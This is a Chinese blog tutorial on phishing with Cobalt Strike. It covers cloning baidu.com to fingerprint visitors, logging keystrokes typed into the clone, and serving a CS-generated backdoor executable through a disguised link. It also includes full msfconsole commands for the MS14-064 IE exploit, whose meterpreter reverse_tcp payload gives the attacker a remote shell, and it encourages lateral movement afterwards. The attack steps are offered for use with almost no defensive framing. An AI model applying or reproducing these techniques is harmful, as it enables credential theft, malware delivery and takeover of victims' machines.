• 网络安全-钓鱼篇-利用cs进行钓鱼


    一、环境

    自行搭建,kill,Windows10,cs

    二、原理

    如图所示

    三、钓鱼演示

    首先第一步:打开System Profiler-分析器功能

    选择克隆www.baidu.com页面做钓鱼

    之后我们通过包装域名,各种手段让攻击对象访问:http:kill的ip/baidu

    之后会自动跳转到百度

    可看到选择应用信息后,钓到了用户用的系统以及浏览器版本型号…这里别小看两个信息,思路是该模块可以修改,利用溢出代码等形式提权或者获得更多的信息收集…下面我会写一些演示!!  

    3.1 克隆模块和克隆网站进行键盘记录攻击

    打开克隆网站模块

     克隆键盘记录

    这里克隆网站可以是http和https的URL…克隆到192.168.2.153:801链接上!! 勾选Log Keystrokes on cloned site后,记录键盘操作!  

    点击web log等待

    等对方在克隆网站上进行操作后

     我们这边直接监听

    可看到记录了对方输入键盘的信息

    3.2克隆网站下载执行木马

    打开Host File 克隆一个页面并提供一个后门文件

    file:选择CS生成的shell,或者MSF也行! 确定URL下载的地址端口链接等情况!  

    木马做好放里面

    生成http://192.168.131.129:801/download/file.exe恶意链接

    制作钓鱼网页

    访问钓鱼网页

    可看到ie访问该页面下载了file.exe生成的CS后门文件… 这里ie带有web安全下载防御功能这种思路是两个模块配合完成的,其中可以修改图标、文件名、弄个免杀、换个欺骗链接,很好钓鱼!

    点击软件木马上线

    3.3 Metasploit溢出代码与Cobalt Strik配合钓鱼(重点)

    本次演示的是思路,拿的是一个针对XP或者以下系统,利用MS14_064利用IE执行远控木马…记住是思路!!

    use exploit/windows/browser/ms14_064_ole_code_execution set srvhost 192.168.2.153 set SRVPORT 6666 set payload windows/meterpreter/reverse_tcp set lhost 192.168.2.153 exploit

     这里很简答,MSF执行即可~  
    `http://192.168.2.153:6666/Sixcra`获得恶意链接

    很简单,利用和方法3一样,打开克隆网站模块,放入Attack即可!! 这里就不勾选键盘记录了,因为直接能控制对方了!

    生成URL:http://192.168.2.153:80/baidu

    1. 可看到当对方访问做好的http://192.168.2.153:80/baidu钓鱼页面后,直接跳转到了百度…
    2. 但是通过溢出漏洞在攻击端获得了对方的控制shell…

    通过控制,继续横向渗透即可!!

  • 相关阅读:
    Docker操作总结
    算术优化与阿奎拉鹰优化的混合算法
    C++面向对象(一)
    口袋参谋:如何写出高权重标题?用对这招很重要!
    AI全栈大模型工程师(九)Function Calling 的机制
    查看局域网是否有外网IP之收藏必备
    java 企业工程管理系统软件源码 自主研发 工程行业适用
    套接字+网络套接字函数+客户端大小写程序
    shell学习-运算符
    [附源码]计算机毕业设计右脑开发教育课程管理系统Springboot程序
  • 原文地址:https://blog.csdn.net/m0_68976043/article/details/139290193